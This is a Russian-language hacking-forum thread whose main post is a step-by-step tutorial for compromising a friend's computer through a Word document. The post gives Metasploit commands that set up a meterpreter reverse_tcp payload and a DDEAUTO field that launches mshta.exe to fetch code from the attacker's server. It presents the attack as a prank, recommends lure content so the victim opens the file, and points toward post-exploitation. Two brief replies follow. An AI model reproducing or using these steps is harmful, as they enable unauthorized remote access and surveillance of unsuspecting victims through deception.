Загрузка...

Взлом твоего друга через MS Office

Тема в разделе Социальная инженерия создана пользователем Ilusdsf 18 фев 2019. 505 просмотров

  1. Ilusdsf
    Ilusdsf Автор темы 18 фев 2019 132 22 окт 2018
    Любите своих друзей и не заставляйте их скучать


    Теория

    DDE exploit используется для динамического обмена данных. Эта уязвимость позволяет передавать данные между приложениями MS Office без взаимодействия между пользователями. Этот метод используется для получения доступа к системе. Можно легко отправить файл другу с данными его "переписки" и он с большим любопытством будет открывать этот файл)

    Установка
    Необходимые составляющие для проведения атаки:

    1. Устройство с Kali Linux.
    2. Устройство с Windows.
    3. Microsoft Office (Word).
    Все описанные действия проводились в Kali Linux. Для начала нам необходимо установить компоненты и добавить их в базу Metasploit. Сначала скачаем эксплоит с помощью команды:

    wget https://raw.githubusercontent.com/r...dules/exploits/windows/script/dde_delivery.rb

    [IMG]
    Далее добавим эту утилиту в папку с эксплоитами Metasploit:

    mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

    [IMG]
    После этого можно переходить в msfconsole. Запускаем и производим обновления всех наших путей:

    msfconsole
    reload_all

    [IMG]
    После этого можно переходить к генерации нашей полезной нагрузки. Для этого необходимо пошагово выполнять такие команды:

    use exploit/windows/dde_delivery

    [IMG]
    Далее нам необходимо установить свой сервис чтобы принимать соединение, для этого нужно указать команду со своим IP адресом:

    set SRVHOST 192.168.177.141
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.177.141
    set LPORT 6708 exploit
    exploit

    [IMG]
    Подготавливаем документ MS Office
    После этого получаем ссылку, которую нужно вмонтировать в документ MS Office. Для этого переходим в раздел "Вставить"->"Быстрые элементы"->"Поле" (Можно использовать быструю комбинацию CTRL + F9).

    {DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.1.6:8080/wi9o8uanVgkjv”}

    [IMG]
    [IMG]
    После открытия документа откроется сессия. После открытия будут два всплывающих окна. Но они без каких либо запретов, просто уведомления о наличии сторонних связей с другими приложениями.

    [IMG]
    Готовая ссылка
    [IMG]
    Получаем сессию
    Заключение
    Вот таким способом можно получить доступ к компьютеру. Дальше смотрите в сторону пост эксплуатации. Там есть очень много чего интересного. Любите своих друзей и не заставляйте их скучать. Можно пошутить вот таким простым, но эффективным способом. Также формулы можно использовать и в других программах MS Office. Для более правдоподобного вида нужно наполнять ********* тематическим содержанием.
     
    Этот материал оказался полезным?
    Вы можете отблагодарить автора темы путем перевода средств на баланс
    Отблагодарить автора
  2. Aleksandr1_inactive146861
    Aleksandr1_inactive146861 24 мар 2019 Ник со смыслом 70 5 авг 2017
    пробовал кто?
     
  3. SaintMurder_inactive629492
    SaintMurder_inactive629492 11 апр 2019 Заблокирован(а) 384 21 окт 2018
    Скрытая реклама своей телеги:what2:
     
Загрузка...
Top